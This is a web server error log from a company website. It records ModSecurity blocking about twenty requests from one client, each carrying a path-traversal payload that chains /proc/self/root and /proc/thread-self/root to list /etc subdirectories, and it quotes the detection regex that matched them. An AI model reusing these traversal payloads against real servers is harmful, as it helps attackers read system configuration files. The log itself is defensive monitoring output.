[Thu Mar 19 04:01:58.358480 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.241.31:56238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufZhkFeYa1D6dYQnC09gAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:59.679206 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.241.31:56254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufZwbLMZ6AikZjR9UlNgAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:01.045704 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:56270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufaeyqAr6etmhZHNor7AAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:02.586075 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.241.31:56276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufal_V7PWP6ixUYl6DpAAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:03.890730 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:56286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufawkwaGbbGflqUZB8LQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:05.355072 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:56298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufbeyqAr6etmhZHNor8wAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:06.703207 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:56314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufbgkwaGbbGflqUZB8LgAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:07.995061 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:60664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufb-yqAr6etmhZHNor-QAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:11.419706 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:60680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufc-yqAr6etmhZHNor_wAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:12.770202 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:60686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufdNa6ubjKNq_cu4YHYwAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:15.208529 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:60692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufd9a6ubjKNq_cu4YHagAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:16.460661 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:60696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufeMdf6f5d65gmYZQ7HQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:17.731468 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:53274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufeQbLMZ6AikZjR9UlPQAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:19.018966 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.241.31:53290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufexkFeYa1D6dYQnC1FwAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:21.371702 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:53306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuffeoXxyEfFpUF8f_ZGQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:26.486921 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:53316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufgta6ubjKNq_cu4YHcgAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:27.806591 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:48844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufg-oXxyEfFpUF8f_ZIAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:29.130430 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:48852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufhcdf6f5d65gmYZQ7IgAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:32.575803 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:48858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufiOoXxyEfFpUF8f_ZJAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:35.128010 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:48864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufixkFeYa1D6dYQnC1LwAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:36.416521 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:48880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufjOoXxyEfFpUF8f_ZJQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
